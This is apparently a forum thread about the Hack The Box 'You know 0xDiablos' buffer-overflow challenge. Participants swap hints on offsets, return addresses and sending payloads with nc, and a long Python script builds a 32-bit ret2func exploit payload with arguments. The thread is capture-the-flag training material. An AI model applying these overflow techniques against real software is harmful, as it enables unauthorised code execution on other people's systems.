[pwn] You know 0xDiablos

Just solved this problem. Had the right answer for a while but nc was the thing that was throwing me off. As a tip, if you connect with nc, make sure you hang around long enough to get a response from the server. :wink:

I think i have the correct payload but i just can not get it to work. If anybody would be willing to discuss my idea/sample and nudge me into the right direction it would be very much appreciated.

Hi there.
Any resources to start learning pwning? Or any resources to start learning how to solve challenges? It is easier for me to solve machines than challenges. Any info is appreciated.


Hi there.
I've written a payload and read a file with some text, and I get a segmentation fault after it.
How can I send my payload to docker.hackthebox.eu port 32133?
When I use nc I don't get any answer. Is it because I have a segmentation fault?

For those not using pwntools (kinda overkill for this challenge IMO):

(cat payload; echo) | nc docker.hackthebox.eu xxxx

@fr0ster said:

Hi there.
I've written a payload and read a file with some text, and I get a segmentation fault after it.
How can I send my payload to docker.hackthebox.eu port 32133?
When I use nc I don't get any answer. Is it because I have a segmentation fault?

I forgot to add '\n' to the payload. Now everything works.

@lamorim said:

I'm stuck here as well. I created a payload that overrides ESP with the address of the function I want to jump to, and got this when running locally:

“Hurry up and try in on server side.”

When I tried it on the instance, it just disconnects. Am I missing something silly here?

I'm exactly at this point and I don't know how to fix this. I have read the posts above mentioning how to send this payload via netcat, but it just won't work.

I have created a payload. When running:
(cat payload; echo) | ./vuln
the “Hurry up…” message is returned.
Yet when I try this on the server:
(cat payload; echo) | nc docker.hackthebox.eu xxxx
I get nothing :frowning:

If anybody could give another hint, I’d be grateful :slight_smile:

@mrtn82 Disassemble the function you are jumping to and see what's going on. It's not just a matter of jumping there.

How do you figure out the return address of the remote binary without a format string vuln? I'm missing something simple here.

There is no position independent code, so the main binary will always be loaded at the same address. However, ASLR will affect shared libraries and stack location.

Got it. If someone needs help, feel free to PM me.

Could someone please explain to me where these zeros after the return address and after the parameters come from?

0xfff0a90c: 0x41414141 0x41414141 0x41414141 0x41414141
0xfff0a91c: 0x080491e2 0x00000000 0x21524111 0x00000000
0xfff0a92c: 0x3f212ff3 0x00000000 0x00000000 0x00000000

Got it!
Really good for beginners like me :slight_smile:

I got the flag, but is it possible to pop a shell?

Yo, can anyone give me a nudge in the right direction? I am in the process of trying to BOF the first function but can't seem to get the return address to point to the function I need, and even if I did, I don't know how I would pass in the required arguments.

I'm struggling. I'm new to exploiting BOFs, so I'd appreciate any nudges or hints. I've managed to get "Hurry up and try in on server side." when running it locally, and I can set the payload to return to main on the server. I just don't understand how I'm supposed to call the function and pass the two params it's asking for.

Hello all, this is my first post on the forum. I just need a small nudge on one thing... I was able to find the second function to which I need to jump; however, I can't figure out how to pass the required arguments... Please PM me if you can.

Hello, to anyone who has solved this challenge: can I ask for some help, please? I'm new to assembly; my question is how to calculate the buffer size in the sym.vuln function. Many thanks!

I've posted on RE StackExchange; could you reply there?

https://reverseengineering.stackexchange.com/questions/25642/variable-size-in-assembly-calculation

@l00zectrl said:

Yo, can anyone give me a nudge in the right direction? I am in the process of trying to BOF the first function but can't seem to get the return address to point to the function I need, and even if I did, I don't know how I would pass in the required arguments.

In the debugger, inside the vuln() function, put a breakpoint immediately after the gets() call and step instruction by instruction until the ret. Look at the $eip register at the step before the ret executes: this will be the return address. It points to the next line in the main function, and this is the address you need to overwrite.
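To make the payload layout concrete for the questions above about passing the two arguments, about finding the buffer offset in vuln, and about the zero words in the stack dump quoted earlier, here is an added Python example. It is not code from the challenge or from any poster in this thread. It assumes what the thread states: a 32-bit, non-PIE binary whose vuln() reads the input with gets(). The 184-byte offset is a placeholder, and the target address and argument values are simply the numbers from that dump reused as sample values; substitute whatever your own disassembly and debugger session give you.

```python
import struct

# Added example for this thread (not code from the challenge or from any poster).
# The target address and argument values are the sample numbers from the stack
# dump quoted above; the 184-byte offset is a placeholder. Replace all of them
# with what you find in your own disassembly and debugger session.

ALPHABET = "abcdefghijklmnopqrstuvwxyz"
WORD = 4  # 32-bit binary: the saved EIP is one 4-byte little-endian word


def cyclic(length, alphabet=ALPHABET, n=WORD):
    """Prefix of a de Bruijn sequence B(26, 4): every 4-byte window occurs once
    (same idea as pwntools' cyclic()). Send it instead of "AAAA...", read the
    value that lands in EIP at the crash, and cyclic_find() turns that value
    into the distance from the start of the buffer to the saved return address."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    class Enough(Exception):
        pass

    def db(t, p):  # Ruskey's recursive construction, stopped once we have enough
        if len(seq) >= length:
            raise Enough
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    try:
        db(1, 1)
    except Enough:
        pass
    return "".join(alphabet[i] for i in seq[:length]).encode()


def cyclic_find(eip, sent_length):
    """eip: the crash value shown by the debugger (int) or the raw 4 bytes.
    Returns the offset of that window in a pattern of the length that was sent."""
    needle = eip if isinstance(eip, bytes) else struct.pack("<I", eip)
    return cyclic(sent_length).find(needle)


def p32(value):
    return struct.pack("<I", value)


def build_payload(offset, target, args, fake_ret=0x41414141):
    """32-bit cdecl ret2func with stack arguments. From the buffer start:
         [offset bytes of padding][target][fake_ret][arg1][arg2]...
    `ret` pops `target`; the word after it is what target's own `ret` will
    jump to (the process crashes there, after the function has done its work);
    the arguments follow because a cdecl callee reads them at [esp+4], [esp+8],
    ... on entry."""
    payload = b"A" * offset + p32(target) + p32(fake_ret)
    payload += b"".join(p32(a) for a in args)
    # gets() returns only at a newline or EOF. Piped from a file, EOF ends the
    # read; over nc the socket stays open, so without "\n" the server just waits.
    return payload + b"\n"


def build_payload_as_64bit(offset, target, args, fake_ret=0x41414141):
    """The same values packed as 8-byte words ("<Q"): the mistake that makes a
    32-bit stack show a 0x00000000 dword after every value and pushes every
    argument one slot out of place. Kept only to show the symptom; do not use."""
    def p64(v):
        return struct.pack("<Q", v)
    payload = b"A" * offset + p64(target) + p64(fake_ret)
    payload += b"".join(p64(a) for a in args)
    return payload + b"\n"


def stack_words(payload, offset):
    """Dwords as the target sees them from the saved-EIP slot onwards (what an
    `x/8wx $esp` at the `ret` would print). Drops the trailing newline."""
    body = payload[offset:-1]
    return [struct.unpack("<I", body[i:i + 4])[0] for i in range(0, len(body), 4)]


if __name__ == "__main__":
    # Placeholder offset; target/argument values reused from the dump above.
    payload = build_payload(184, 0x080491E2, [0x21524111, 0x3F212FF3])
    with open("payload", "wb") as f:
        f.write(payload)
    print([hex(w) for w in stack_words(payload, 184)])
```

Run it with python3 to write the payload file, then send it with the nc line given earlier in the thread; the extra `echo` there only appends a second newline, which gets() never reads. To get the offset, send cyclic(300) to the binary under gdb, take the EIP value from the crash and pass it to cyclic_find(value, 300); the alternative is to read the buffer's ebp-relative offset from the disassembly of vuln and add 4 for the saved ebp, since the return address sits at ebp+4.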

@wazKoo said:

Anyone able to get a shell via shellcode or ROP to system("/bin/sh")?

It seems to me that this is impossible: we do not know at what address the libc.so library is loaded on the docker instance.